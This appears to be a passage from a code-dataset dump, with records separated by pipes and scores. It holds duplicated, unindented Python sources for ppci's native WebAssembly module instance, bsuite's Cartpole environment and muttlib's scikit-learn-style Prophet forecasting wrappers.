if new_size >= 0x10000:
return -1
if max_size is not None and new_size > max_size:
return -1
# Read old data:
self._memory_data_page.seek(0)
old_data = self._memory_data_page.read()
# Create new page and fill with old data:
self._memory_data_page = MemoryPage(new_size * PAGE_SIZE)
self._memory_data_page.write(old_data)
# Update pointer:
self.set_mem_base_ptr(self._memory_data_page.addr)
return old_size
def memory_create(self, min_size, max_size):
assert len(self._memories) == 0
self._memory_data_page = MemoryPage(min_size * PAGE_SIZE)
mem0 = NativeWasmMemory(self, min_size, max_size)
self._memories.append(mem0)
self.set_mem_base_ptr(self._memory_data_page.addr)
def set_mem_base_ptr(self, base_addr):
""" Set memory base address """
baseptr = self._code_module.get_symbol_offset("wasm_mem0_address")
# print(baseptr)
# TODO: major hack:
# TODO: too many assumptions made here ...
self._code_module._data_page.seek(baseptr)
self._code_module._data_page.write(struct.pack("Q", base_addr))
def get_func_by_index(self, index: int):
exported_name = self._wasm_function_names[index]
return getattr(self._code_module, exported_name)
def get_global_by_index(self, index: int):
global_name = self._wasm_global_names[index]
return NativeWasmGlobal(global_name, self._code_module)
class NativeWasmMemory(WasmMemory):
""" Native wasm memory emulation """
def __init__(self, instance, min_size, max_size):
super().__init__(min_size, max_size)
self._instance = instance
def memory_size(self) -> int:
""" return memory size in pages """
return self._memory_data_page.size // PAGE_SIZE
def write(self, address: int, data):
""" Write some data to memory """
self._instance._memory_data_page.seek(address)
self._instance._memory_data_page.write(data)
def read(self, address: int, size: int) -> bytes:
self._instance._memory_data_page.seek(address)
data = self._instance._memory_data_page.read(size)
assert len(data) == size
return data
class NativeWasmGlobal(WasmGlobal):
def __init__(self, name, code_obj):
super().__init__(name)
self._code_obj = code_obj
def _get_ptr(self):
# print('Getting address of', self.name)
vpointer = getattr(self._code_obj, self.name[1].name)
return vpointer
def read(self):
addr = self._get_ptr()
# print('Reading', self.name, addr)
value = addr.contents.value
return value
def write(self, value):
addr = self._get_ptr()
# print('Writing', self.name, addr, value)
addr.contents.value = value
|
ppci/wasm/execution/_native_instance.py
|
import logging
import os
import shelve
import struct
from ...utils.codepage import load_obj, MemoryPage
from ...irutils import verify_module
from .. import wasm_to_ir
from ..components import Table
from ..util import PAGE_SIZE
from ._base_instance import ModuleInstance, WasmMemory, WasmGlobal
logger = logging.getLogger("instantiate")
def native_instantiate(module, imports, reporter, cache_file):
""" Load wasm module native """
from ...api import ir_to_object, get_current_arch
logger.info("Instantiating wasm module as native code")
arch = get_current_arch()
# key = (arch, module)
# TODO: think of clever caching trickery:
cache_file = None
if cache_file and os.path.exists(cache_file):
logger.info("Using cached object from %s", cache_file)
with shelve.open(cache_file) as s:
obj = s["obj"]
ppci_module = s["ppci_module"]
else:
# TODO: use cache here to short circuit re-compilation
# hash(key)
# print(hash(key))
# hgkfdg
ppci_module = wasm_to_ir(
module, arch.info.get_type_info("ptr"), reporter=reporter
)
verify_module(ppci_module)
obj = ir_to_object([ppci_module], arch, debug=True, reporter=reporter)
if cache_file:
logger.info("Saving object to %s for later use", cache_file)
with shelve.open(cache_file) as s:
s["obj"] = obj
s["ppci_module"] = ppci_module
instance = NativeModuleInstance(obj, imports)
instance._wasm_function_names = ppci_module._wasm_function_names
instance._wasm_global_names = ppci_module._wasm_global_names
return instance
class NativeModuleInstance(ModuleInstance):
""" Wasm module loaded as natively compiled code """
def __init__(self, obj, imports2):
super().__init__()
imports = {}
imports["wasm_rt_memory_grow"] = self.memory_grow
imports["wasm_rt_memory_size"] = self.memory_size
for name, imp_obj in imports2.items():
assert name not in imports
if isinstance(imp_obj, Table):
# print(name, obj)
ptr_size = 8 # TODO: determine this?
table_byte_size = imp_obj.max * ptr_size
# Allocate native memory page for table.
self._table_obj = MemoryPage(table_byte_size)
# Enter table memory page in extra symbols:
magic_key = "func_table"
assert magic_key not in imports
imports[magic_key] = self._table_obj
imports[name] = self._table_obj
else:
imports[name] = imp_obj
self._code_module = load_obj(obj, imports=imports)
def _run_init(self):
self._code_module._run_init()
def memory_size(self) -> int:
""" return memory size in pages """
return self._memory_data_page.size // PAGE_SIZE
def memory_grow(self, amount: int) -> int:
""" Grow memory and return the old size.
Current strategy:
- claim new memory
- copy all data
- free old memory
- update wasm memory base pointer
"""
max_size = self._memories[0].max_size
old_size = self.memory_size()
new_size = old_size + amount
# Keep memory within sensible bounds:
if new_size >= 0x10000:
return -1
if max_size is not None and new_size > max_size:
return -1
# Read old data:
self._memory_data_page.seek(0)
old_data = self._memory_data_page.read()
# Create new page and fill with old data:
self._memory_data_page = MemoryPage(new_size * PAGE_SIZE)
self._memory_data_page.write(old_data)
# Update pointer:
self.set_mem_base_ptr(self._memory_data_page.addr)
return old_size
def memory_create(self, min_size, max_size):
assert len(self._memories) == 0
self._memory_data_page = MemoryPage(min_size * PAGE_SIZE)
mem0 = NativeWasmMemory(self, min_size, max_size)
self._memories.append(mem0)
self.set_mem_base_ptr(self._memory_data_page.addr)
def set_mem_base_ptr(self, base_addr):
""" Set memory base address """
baseptr = self._code_module.get_symbol_offset("wasm_mem0_address")
# print(baseptr)
# TODO: major hack:
# TODO: too many assumptions made here ...
self._code_module._data_page.seek(baseptr)
self._code_module._data_page.write(struct.pack("Q", base_addr))
def get_func_by_index(self, index: int):
exported_name = self._wasm_function_names[index]
return getattr(self._code_module, exported_name)
def get_global_by_index(self, index: int):
global_name = self._wasm_global_names[index]
return NativeWasmGlobal(global_name, self._code_module)
class NativeWasmMemory(WasmMemory):
""" Native wasm memory emulation """
def __init__(self, instance, min_size, max_size):
super().__init__(min_size, max_size)
self._instance = instance
def memory_size(self) -> int:
""" return memory size in pages """
return self._memory_data_page.size // PAGE_SIZE
def write(self, address: int, data):
""" Write some data to memory """
self._instance._memory_data_page.seek(address)
self._instance._memory_data_page.write(data)
def read(self, address: int, size: int) -> bytes:
self._instance._memory_data_page.seek(address)
data = self._instance._memory_data_page.read(size)
assert len(data) == size
return data
class NativeWasmGlobal(WasmGlobal):
def __init__(self, name, code_obj):
super().__init__(name)
self._code_obj = code_obj
def _get_ptr(self):
# print('Getting address of', self.name)
vpointer = getattr(self._code_obj, self.name[1].name)
return vpointer
def read(self):
addr = self._get_ptr()
# print('Reading', self.name, addr)
value = addr.contents.value
return value
def write(self, value):
addr = self._get_ptr()
# print('Writing', self.name, addr, value)
addr.contents.value = value
| 0.2414 | 0.160102 |
"""The Cartpole reinforcement learning environment."""
# Import all packages
import collections
from bsuite.experiments.cartpole import sweep
import dm_env
from dm_env import specs
import numpy as np
CartpoleState = collections.namedtuple(
'CartpoleState', ['x', 'x_dot', 'theta', 'theta_dot', 'time_elapsed'])
CartpoleConfig = collections.namedtuple(
'CartpoleConfig',
['mass_cart', 'mass_pole', 'length', 'force_mag', 'gravity']
)
def step_cartpole(action: int,
timescale: float,
state: CartpoleState,
config: CartpoleConfig) -> CartpoleState:
"""Helper function to step cartpole state under given config."""
# Unpack variables into "short" names for mathematical equation
force = (action - 1) * config.force_mag
cos = np.cos(state.theta)
sin = np.sin(state.theta)
pl = config.mass_pole * config.length
l = config.length
m_pole = config.mass_pole
m_total = config.mass_cart + config.mass_pole
g = config.gravity
# Compute the physical evolution
temp = (force + pl * state.theta_dot**2 * sin) / m_total
theta_acc = (g * sin - cos * temp) / (l * (4/3 - m_pole * cos**2 / m_total))
x_acc = temp - pl * theta_acc * cos / m_total
# Update states according to discrete dynamics
x = state.x + timescale * state.x_dot
x_dot = state.x_dot + timescale * x_acc
theta = np.remainder(
state.theta + timescale * state.theta_dot, 2 * np.pi)
theta_dot = state.theta_dot + timescale * theta_acc
time_elapsed = state.time_elapsed + timescale
return CartpoleState(x, x_dot, theta, theta_dot, time_elapsed)
class Cartpole(dm_env.Environment):
"""This implements a version of the classic Cart Pole task.
For more information see:
https://webdocs.cs.ualberta.ca/~sutton/papers/barto-sutton-anderson-83.pdf
The observation is a vector representing:
`(x, x_dot, sin(theta), cos(theta), theta_dot, time_elapsed)`
The actions are discrete ['left', 'stay', 'right']. Episodes start with the
pole close to upright. Episodes end when the pole falls, the cart falls off
the table, or the max_time is reached.
"""
def __init__(self,
height_threshold: float = 0.8,
x_threshold: float = 3.,
timescale: float = 0.01,
max_time: float = 10.,
init_range: float = 0.05,
seed: int = None):
# Setup.
self._state = CartpoleState(0, 0, 0, 0, 0)
self._reset_next_step = True
self._rng = np.random.RandomState(seed)
self._init_fn = lambda: self._rng.uniform(low=-init_range, high=init_range)
# Logging info
self._raw_return = 0.
self._best_episode = 0.
self._episode_return = 0.
# Reward/episode logic
self._height_threshold = height_threshold
self._x_threshold = x_threshold
self._timescale = timescale
self._max_time = max_time
# Problem config
self._cartpole_config = CartpoleConfig(
mass_cart=1.,
mass_pole=0.1,
length=0.5,
force_mag=10.,
gravity=9.8,
)
# Public attributes.
self.bsuite_num_episodes = sweep.NUM_EPISODES
def reset(self):
self._reset_next_step = False
self._state = CartpoleState(
x=self._init_fn(),
x_dot=self._init_fn(),
theta=self._init_fn(),
theta_dot=self._init_fn(),
time_elapsed=0.,
)
self._episode_return = 0
return dm_env.restart(self.observation)
def step(self, action):
if self._reset_next_step:
return self.reset()
self._state = step_cartpole(
action=action,
timescale=self._timescale,
state=self._state,
config=self._cartpole_config,
)
# Rewards only when the pole is central and balanced
is_reward = (np.cos(self._state.theta) > self._height_threshold
and np.abs(self._state.x) < self._x_threshold)
reward = 1. if is_reward else 0.
self._raw_return += reward
self._episode_return += reward
self._best_episode = max(self._episode_return, self._best_episode)
if self._state.time_elapsed > self._max_time or not is_reward:
self._reset_next_step = True
return dm_env.termination(reward=reward, observation=self.observation)
else: # continuing transition.
return dm_env.transition(reward=reward, observation=self.observation)
def action_spec(self):
return specs.DiscreteArray(dtype=np.int, num_values=3, name='action')
def observation_spec(self):
return specs.Array(shape=(1, 6), dtype=np.float32, name='state')
@property
def observation(self) -> np.ndarray:
"""Approximately normalize output."""
obs = np.zeros((1, 6), dtype=np.float32)
obs[0, 0] = self._state.x / self._x_threshold
obs[0, 1] = self._state.x_dot / self._x_threshold
obs[0, 2] = np.sin(self._state.theta)
obs[0, 3] = np.cos(self._state.theta)
obs[0, 4] = self._state.theta_dot
obs[0, 5] = self._state.time_elapsed / self._max_time
return obs
def bsuite_info(self):
return dict(raw_return=self._raw_return,
best_episode=self._best_episode)
|
bsuite/experiments/cartpole/cartpole.py
|
"""The Cartpole reinforcement learning environment."""
# Import all packages
import collections
from bsuite.experiments.cartpole import sweep
import dm_env
from dm_env import specs
import numpy as np
CartpoleState = collections.namedtuple(
'CartpoleState', ['x', 'x_dot', 'theta', 'theta_dot', 'time_elapsed'])
CartpoleConfig = collections.namedtuple(
'CartpoleConfig',
['mass_cart', 'mass_pole', 'length', 'force_mag', 'gravity']
)
def step_cartpole(action: int,
timescale: float,
state: CartpoleState,
config: CartpoleConfig) -> CartpoleState:
"""Helper function to step cartpole state under given config."""
# Unpack variables into "short" names for mathematical equation
force = (action - 1) * config.force_mag
cos = np.cos(state.theta)
sin = np.sin(state.theta)
pl = config.mass_pole * config.length
l = config.length
m_pole = config.mass_pole
m_total = config.mass_cart + config.mass_pole
g = config.gravity
# Compute the physical evolution
temp = (force + pl * state.theta_dot**2 * sin) / m_total
theta_acc = (g * sin - cos * temp) / (l * (4/3 - m_pole * cos**2 / m_total))
x_acc = temp - pl * theta_acc * cos / m_total
# Update states according to discrete dynamics
x = state.x + timescale * state.x_dot
x_dot = state.x_dot + timescale * x_acc
theta = np.remainder(
state.theta + timescale * state.theta_dot, 2 * np.pi)
theta_dot = state.theta_dot + timescale * theta_acc
time_elapsed = state.time_elapsed + timescale
return CartpoleState(x, x_dot, theta, theta_dot, time_elapsed)
class Cartpole(dm_env.Environment):
"""This implements a version of the classic Cart Pole task.
For more information see:
https://webdocs.cs.ualberta.ca/~sutton/papers/barto-sutton-anderson-83.pdf
The observation is a vector representing:
`(x, x_dot, sin(theta), cos(theta), theta_dot, time_elapsed)`
The actions are discrete ['left', 'stay', 'right']. Episodes start with the
pole close to upright. Episodes end when the pole falls, the cart falls off
the table, or the max_time is reached.
"""
def __init__(self,
height_threshold: float = 0.8,
x_threshold: float = 3.,
timescale: float = 0.01,
max_time: float = 10.,
init_range: float = 0.05,
seed: int = None):
# Setup.
self._state = CartpoleState(0, 0, 0, 0, 0)
self._reset_next_step = True
self._rng = np.random.RandomState(seed)
self._init_fn = lambda: self._rng.uniform(low=-init_range, high=init_range)
# Logging info
self._raw_return = 0.
self._best_episode = 0.
self._episode_return = 0.
# Reward/episode logic
self._height_threshold = height_threshold
self._x_threshold = x_threshold
self._timescale = timescale
self._max_time = max_time
# Problem config
self._cartpole_config = CartpoleConfig(
mass_cart=1.,
mass_pole=0.1,
length=0.5,
force_mag=10.,
gravity=9.8,
)
# Public attributes.
self.bsuite_num_episodes = sweep.NUM_EPISODES
def reset(self):
self._reset_next_step = False
self._state = CartpoleState(
x=self._init_fn(),
x_dot=self._init_fn(),
theta=self._init_fn(),
theta_dot=self._init_fn(),
time_elapsed=0.,
)
self._episode_return = 0
return dm_env.restart(self.observation)
def step(self, action):
if self._reset_next_step:
return self.reset()
self._state = step_cartpole(
action=action,
timescale=self._timescale,
state=self._state,
config=self._cartpole_config,
)
# Rewards only when the pole is central and balanced
is_reward = (np.cos(self._state.theta) > self._height_threshold
and np.abs(self._state.x) < self._x_threshold)
reward = 1. if is_reward else 0.
self._raw_return += reward
self._episode_return += reward
self._best_episode = max(self._episode_return, self._best_episode)
if self._state.time_elapsed > self._max_time or not is_reward:
self._reset_next_step = True
return dm_env.termination(reward=reward, observation=self.observation)
else: # continuing transition.
return dm_env.transition(reward=reward, observation=self.observation)
def action_spec(self):
return specs.DiscreteArray(dtype=np.int, num_values=3, name='action')
def observation_spec(self):
return specs.Array(shape=(1, 6), dtype=np.float32, name='state')
@property
def observation(self) -> np.ndarray:
"""Approximately normalize output."""
obs = np.zeros((1, 6), dtype=np.float32)
obs[0, 0] = self._state.x / self._x_threshold
obs[0, 1] = self._state.x_dot / self._x_threshold
obs[0, 2] = np.sin(self._state.theta)
obs[0, 3] = np.cos(self._state.theta)
obs[0, 4] = self._state.theta_dot
obs[0, 5] = self._state.time_elapsed / self._max_time
return obs
def bsuite_info(self):
return dict(raw_return=self._raw_return,
best_episode=self._best_episode)
| 0.924509 | 0.607809 |
from copy import deepcopy
from inspect import isclass, signature
import numpy as np
import pandas as pd
from fbprophet import Prophet
from sklearn.base import BaseEstimator
class SkProphet(Prophet):
DS = 'ds'
def __init__(
self,
sk_date_column=DS,
sk_yhat_only=True,
sk_extra_regressors=None,
prophet_kwargs=None,
):
"""Scikit learn compatible interface for FBProphet.
Parameters
----------
sk_date_column: str
Name of the column to use as date in Prophet.
sk_yhat_only: Boolean
True to return only the yhat from Prophet predictions.
False to return everything.
sk_extra_regressors: [] or [str] or [dict()]
List with extra regressors to use. The list can have:
* strings: column names (default prophet arguments for extra
regressors will be used).
* dicts: {name: *column_name*, prior_scale: _, standardize: _,
mode: _}
For more information see Prophet.add_regressors.
prophet_kwargs: dict
Keyword arguments to forward to Prophet.
"""
if sk_extra_regressors is None:
sk_extra_regressors = []
if prophet_kwargs is None:
prophet_kwargs = {}
super().__init__(**prophet_kwargs)
self.sk_date_column = sk_date_column
self.sk_yhat_only = sk_yhat_only
self.sk_extra_regressors = sk_extra_regressors
self.prophet_kwargs = prophet_kwargs
self._set_my_extra_regressors()
def fit(
self, X, y=None, copy=True, **fit_params
): # pylint: disable=arguments-differ
"""Scikit learn's like fit on the Prophet model.
Parameters
----------
X: pd.DataFrame
A dataframe with the data to fit.
It is expected to have a column with datetime values named as
*self.sk_date_column*.
y: None or str or (list, tuple, numpy.ndarray, pandas.Series/DataFrame)
The label values to fit. If y is:
- None: the column 'y' should be contained in X.
- str: the name of the column to use in X.
- list, tuple, ndarray, etc: the values to fit.
If the values have two dimensions (a matrix instead of a vector)
the first column will be used.
E.g.: [1, 3] -> [1, 3] will be used.
E.g.: [[1], [3]] -> [1, 3] will be used.
E.g.: [[1, 2], [3, 4]] -> [1, 3] will be used.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
If True is set, X should contain the `ds` and `y` columns for
prophet with those names.
If False is provided, the input data will be copied and the copy
modified if required.
fit_params: keyword arguments
Keyword arguments to forward to Prophet's fit.
"""
if not isinstance(X, pd.DataFrame):
raise TypeError('Arg "X" passed can only be of pandas.DataFrame type.')
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
if y is not None:
if isinstance(y, str) and y in X.columns:
X = X.rename({y: 'y'}, axis=1)
else:
X['y'] = self._as_np_vector(y)
return super().fit(X, **fit_params)
def predict(self, X, copy=True): # pylint: disable=arguments-differ
"""Scikit learn's predict (returns predicted values).
Parameters
----------
X: pandas.DataFrame
Input data for predictions.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
If True is set, X should contain the `ds` and `y` columns for
prophet with those names.
If False is provided, the input data will be copied and the copy
modified if required.
"""
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
predictions = super().predict(X)
if self.sk_yhat_only:
predictions = predictions.yhat.values
return predictions
def get_params(self, deep=True):
"""Scikit learn's get_params (returns the estimator's params)."""
prophet_attrs = [
attr for attr in signature(Prophet.__init__).parameters if attr != 'self'
]
sk_attrs = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
prophet_params = {a: getattr(self, a, None) for a in prophet_attrs}
sk_params = {a: getattr(self, a, None) for a in sk_attrs}
if deep:
sk_params = deepcopy(sk_params)
prophet_params = deepcopy(prophet_params)
sk_params['prophet_kwargs'].update(prophet_params)
return sk_params
def set_params(self, **params):
"""Scikit learn's set_params (sets the parameters provided).
Note on prophet keyword arguments precedence; this applies:
- First, if some argument is explicitly provided, this value will be kept.
- If not, but provided inside a 'prophet_kwargs' dict, the last is kept.
- Lastly, if not provided in neither way but currently set, the value is not erased.
"""
sk_kws = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
current_prophet_kws = getattr(self, 'prophet_kwargs', {})
explicit_prophet_kws = {}
args_passed_prophet_kws = {}
for attr, value in params.items():
if attr == 'prophet_kwargs':
explicit_prophet_kws = value
elif attr not in sk_kws:
args_passed_prophet_kws[attr] = value
else:
setattr(self, attr, value)
prophet_kws = current_prophet_kws
prophet_kws.update(explicit_prophet_kws)
prophet_kws.update(args_passed_prophet_kws)
for attr, value in prophet_kws.items():
setattr(self, attr, value)
setattr(self, 'prophet_kwargs', prophet_kws)
self._set_my_extra_regressors()
return self
def _set_my_extra_regressors(self):
"""Adds the regressors defined in self.sk_extra_regressors.
It is meant to be used at initialization.
"""
if self.extra_regressors:
self.extra_regressors = self.extra_regressors.__class__()
for regressor in self.sk_extra_regressors:
if isinstance(regressor, str):
self.add_regressor(regressor)
elif isinstance(regressor, dict):
self.add_regressor(**regressor)
else:
raise TypeError(
'Invalid extra_regressor in SkProphet.'
'Extra regressors must be strings or dicts with '
'{name: *column_name*, prior_scale: _, standardize: _, '
'mode: _}'
)
def _as_np_vector(self, y):
"""Ensures a list, tuple, pandas.Series, pandas.DataFrame
or numpy.ndarray is returned as a numpy.ndarray of dimension 1.
Parameters
----------
y: list, tuple, numpy.ndarray, pandas.Series, pandas.DataFrame
The object containing the y values to fit.
If y is multidimensional, e.g.: [[1, 2], [3, 4]], the first column
will be returned as y value, continuining the example: [1, 3].
Returns
-------
numpy.ndarray of dimension 1
The values as a numpy array of dimension 1.
"""
if isinstance(y, (list, tuple)):
y = np.asarray(y)
elif isinstance(y, (pd.Series, pd.DataFrame)):
y = y.values
if isinstance(y, np.ndarray):
if len(y.shape) > 1:
y = y[:, 0]
return y
def __repr__(self):
"""Text representation of the object to look it nicely in the
interpreter.
"""
return (
f'{self.__class__.__name__}('
f'sk_date_column="{self.sk_date_column}", '
f'sk_yhat_only={self.sk_yhat_only}, '
f'sk_extra_regressors={self.extra_regressors}'
f'prophet_kwargs={self.prophet_kwargs})'
)
__str__ = __repr__
class StepsSelectorEstimator(BaseEstimator):
def __init__(
self, estimator_class, amount_of_steps, estimator_kwargs=None, sort_col='date'
):
"""An estimator that only uses a certain amount of rows on fit.
Parameters
----------
estimator_class: Classer or Estimator Class or estimator instance
Estimator class to use to fit, if an Estimator Class is provided
it will be wrapped with a metaestimator.Classer, if an instance
is provided, its classed will be wrapped.
examples:
- Classer(sklearn.ensemble.RandomForestRegressor)
- sklearn.ensemble.RandomForestRegressor
- sklearn.ensemble.RandomForestRegressor()
amount_of_steps: int
The amount of time steps to use for training.
sort_col: str
Name of the column which will be used for sorting if X is a
dataframe and has the column.
estimator_kwargs: dict
Keyword arguments to initialize EstimatorClass
E.g.:
> StepsSelectorEstimator(RandomForestRegressor(), 100)
"""
if estimator_kwargs is None:
estimator_kwargs = {}
self.amount_of_steps = amount_of_steps
self.sort_col = sort_col
self.estimator_kwargs = estimator_kwargs
self.estimator_class = Classer.from_obj(estimator_class)
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
def fit(self, X, y):
"""Fits self.estimator only to the last self.amount_of_steps rows.
Tries to sort X first.
Parameters
----------
X: pd.DataFrame
A dataframe to fit.
y: vector like
Labels
"""
if self.sort_col in X.columns:
X = X.sort_values(self.sort_col, axis=0)
index_to_drop = X.iloc[: -self.amount_of_steps].index
y = y.drop(index_to_drop).reset_index(drop=True)
X = X.drop(index_to_drop).reset_index(drop=True)
self._estimator.fit(X, y)
return self
def predict(self, X):
"""Scikit's learn like predict."""
return self._estimator.predict(X)
def get_params(self, deep=True):
"""Get estimator params."""
kwargs = self.estimator_kwargs
if deep:
kwargs = deepcopy(kwargs)
return {
'estimator_class': self.estimator_class,
'amount_of_steps': self.amount_of_steps,
'sort_col': self.sort_col,
'estimator_kwargs': kwargs,
}
def set_params(self, **params):
"""Sets the estimator's params to \*\*params.""" # pylint: disable=anomalous-backslash-in-string
self.estimator_class = Classer.from_obj(params['estimator_class'])
self.amount_of_steps = params['amount_of_steps']
self.sort_col = params['sort_col']
self.estimator_kwargs = params['estimator_kwargs']
self._estimator = self.estimator_class.new(**self.estimator_kwargs)
return self
def __repr__(self): # pylint: disable=signature-differs
"""Text representation of the object to look it nicely in the
interpreter.
"""
return (
f'{self.__class__.__name__}('
f'estimator_class={Classer.from_obj(self.estimator_class)}, '
f'amount_of_steps={self.amount_of_steps}, '
f'estimator_kwargs={self.estimator_kwargs})'
)
__str__ = __repr__
class Classer:
def __init__(self, EstimatorClass):
"""Wraps an EstimatorClass to avoid sklearn.base.clone exploting when
called against an EstimatorClass during grid search of metaestimators.
Parameters
----------
EstimatorClass: class
A Sklearn compatible estimator class.
"""
self._class = EstimatorClass
def new(self, *args, **kwargs):
"""Returns a new instance of the wrapped class initialized with the
args and kwargs.
"""
return self._class(*args, **kwargs)
@classmethod
def from_obj(cls, obj):
"""Initializes a new classer from an object, which can be another
Classer, a class or an instance.
"""
if isinstance(obj, Classer):
return obj
elif isclass(obj):
return Classer(obj)
else:
return Classer(obj.__class__)
def __eq__(self, other):
"""Equality checks inner class wrapped."""
return self.__class__ == other.__class__ and self._class == other._class
def __repr__(self):
"""Text representation of the object to look it nicely in the
interpreter.
"""
return f'{self.__class__.__name__}({self._class.__name__})'
__str__ = __repr__
|
muttlib/forecast.py
|
from copy import deepcopy
from inspect import isclass, signature
import numpy as np
import pandas as pd
from fbprophet import Prophet
from sklearn.base import BaseEstimator
class SkProphet(Prophet):
DS = 'ds'
def __init__(
self,
sk_date_column=DS,
sk_yhat_only=True,
sk_extra_regressors=None,
prophet_kwargs=None,
):
"""Scikit learn compatible interface for FBProphet.
Parameters
----------
sk_date_column: str
Name of the column to use as date in Prophet.
sk_yhat_only: Boolean
True to return only the yhat from Prophet predictions.
False to return everything.
sk_extra_regressors: [] or [str] or [dict()]
List with extra regressors to use. The list can have:
* strings: column names (default prophet arguments for extra
regressors will be used).
* dicts: {name: *column_name*, prior_scale: _, standardize: _,
mode: _}
For more information see Prophet.add_regressors.
prophet_kwargs: dict
Keyword arguments to forward to Prophet.
"""
if sk_extra_regressors is None:
sk_extra_regressors = []
if prophet_kwargs is None:
prophet_kwargs = {}
super().__init__(**prophet_kwargs)
self.sk_date_column = sk_date_column
self.sk_yhat_only = sk_yhat_only
self.sk_extra_regressors = sk_extra_regressors
self.prophet_kwargs = prophet_kwargs
self._set_my_extra_regressors()
def fit(
self, X, y=None, copy=True, **fit_params
): # pylint: disable=arguments-differ
"""Scikit learn's like fit on the Prophet model.
Parameters
----------
X: pd.DataFrame
A dataframe with the data to fit.
It is expected to have a column with datetime values named as
*self.sk_date_column*.
y: None or str or (list, tuple, numpy.ndarray, pandas.Series/DataFrame)
The label values to fit. If y is:
- None: the column 'y' should be contained in X.
- str: the name of the column to use in X.
- list, tuple, ndarray, etc: the values to fit.
If the values have two dimensions (a matrix instead of a vector)
the first column will be used.
E.g.: [1, 3] -> [1, 3] will be used.
E.g.: [[1], [3]] -> [1, 3] will be used.
E.g.: [[1, 2], [3, 4]] -> [1, 3] will be used.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
If True is set, X should contain the `ds` and `y` columns for
prophet with those names.
If False is provided, the input data will be copied and the copy
modified if required.
fit_params: keyword arguments
Keyword arguments to forward to Prophet's fit.
"""
if not isinstance(X, pd.DataFrame):
raise TypeError('Arg "X" passed can only be of pandas.DataFrame type.')
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
if y is not None:
if isinstance(y, str) and y in X.columns:
X = X.rename({y: 'y'}, axis=1)
else:
X['y'] = self._as_np_vector(y)
return super().fit(X, **fit_params)
def predict(self, X, copy=True): # pylint: disable=arguments-differ
"""Scikit learn's predict (returns predicted values).
Parameters
----------
X: pandas.DataFrame
Input data for predictions.
copy: Boolean
True to copy the input dataframe before working with it to avoid
modifying the original one.
If True is set, X should contain the `ds` and `y` columns for
prophet with those names.
If False is provided, the input data will be copied and the copy
modified if required.
"""
if copy:
X = X.copy()
if self.sk_date_column != self.DS and self.sk_date_column in X.columns:
X = X.rename({self.sk_date_column: self.DS}, axis=1)
predictions = super().predict(X)
if self.sk_yhat_only:
predictions = predictions.yhat.values
return predictions
def get_params(self, deep=True):
"""Scikit learn's get_params (returns the estimator's params)."""
prophet_attrs = [
attr for attr in signature(Prophet.__init__).parameters if attr != 'self'
]
sk_attrs = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
prophet_params = {a: getattr(self, a, None) for a in prophet_attrs}
sk_params = {a: getattr(self, a, None) for a in sk_attrs}
if deep:
sk_params = deepcopy(sk_params)
prophet_params = deepcopy(prophet_params)
sk_params['prophet_kwargs'].update(prophet_params)
return sk_params
def set_params(self, **params):
"""Scikit learn's set_params (sets the parameters provided).
Note on prophet keyword arguments precedence; this applies:
- First, if some argument is explicitly provided, this value will be kept.
- If not, but provided inside a 'prophet_kwargs' dict, the last is kept.
- Lastly, if not provided in neither way but currently set, the value is not erased.
"""
sk_kws = [
attr for attr in signature(self.__init__).parameters if attr != 'self'
]
current_prophet_kws = getattr(self, 'prophet_kwargs', {})
explicit_prophet_kws = {}
args_passed_prophet_kws = {}
for attr, value in params.items():
if attr == 'prophet_kwargs':
explicit_prophet_kws = value
elif attr not in sk_kws:
args_passed_prophet_kws[attr] = value
else:
setattr(self, attr, value)
prophet_kws = current_prophet_kws
prophet_kws.update(explicit_prophet_kws)
prophet_kws.update(args_passed_prophet_kws)
for attr, value in prophet_kws.items():
setattr(self, attr, value)
setattr(self, 'prophet_kwargs', prophet_kws)
self._set_my_extra_regressors()
return self
def _set_my_extra_regressors(self):
"""Adds the regressors defined in self.sk_extra_regressors.
It is meant to be used at initialization.
"""
if self.extra_regressors:
self.extra_regressors = self.extra_regressors.__class__()
for regressor in self.sk_extra_regressors:
if isinstance(regressor, str):
self.add_regressor(regressor)
elif isinstance(regressor, dict):
self.add_regressor(**regressor)
else:
raise TypeError(
'Invalid extra_regressor in SkProphet.'
'Extra regressors must be strings or dicts with '
'{name: *column_name*, prior_scale: _, standardize: _, '
'mode: _}'
)
def _as_np_vector(self, y):
"""Ensures a list, tuple, pandas.Series, pandas.DataFrame
or numpy.ndarray is returned as a numpy.ndarray of dimension 1.
Parameters
----------
y: list, tuple, numpy.ndarray, pandas.Series, pandas.DataFrame
The object containing the y values to fit.
If y is multidimensional, e.g.: [[1, 2], [3, 4]], the first column
will be returned as y value, continuining the example: [1, 3].
Returns
-------
numpy.ndarray of dimension 1
The values as a numpy array of dimension 1.
"""
if isinstance(y, (list, tuple)):
y = np.asarray(y)
elif isinstance(y, (pd.Series, pd.DataFrame)):
y = y.values
if isinstance(y, np.ndarray):
if len(y.shape) > 1:
y = y[:, 0]
return y
def __repr__(self):
"""Text representation of the object to look it nicely in the
interpreter.
"""
return (
f'{self.__class__.__name__}('
f'sk_date_column="{self.sk_date_column}", '
f'sk_yhat_only={self.sk_yhat_only}, '
f'sk_extra_regressors={self.extra_regressors}'
f'prophet_kwargs={self.prophet_kwargs})'
)
__str__ = __repr__
class StepsSelectorEstimator(BaseEstimator):
def __init__(
self, estimator_class, amount_of_steps, estimator_kwargs=None, sort_col='date'
):
"""An estimator that only uses a certain amount of rows on fit.
Parameters
----------
estimator_class: Classer or Estimator Class or estimator instance
Estimator class to use to fit, if an Estimator Class is provided
it will be wrapped with a metaestimator.Classer, if an instance
is provided, its classed will be wrapped.
examples:
- Classer(sklearn.ensemble.RandomForestRegressor)
- sklearn.ensemble.RandomForestRegressor
- sklearn.ensemble.RandomForestRegressor()
amount_of_steps: int
The amount of time steps to use for training.
sort_col: str
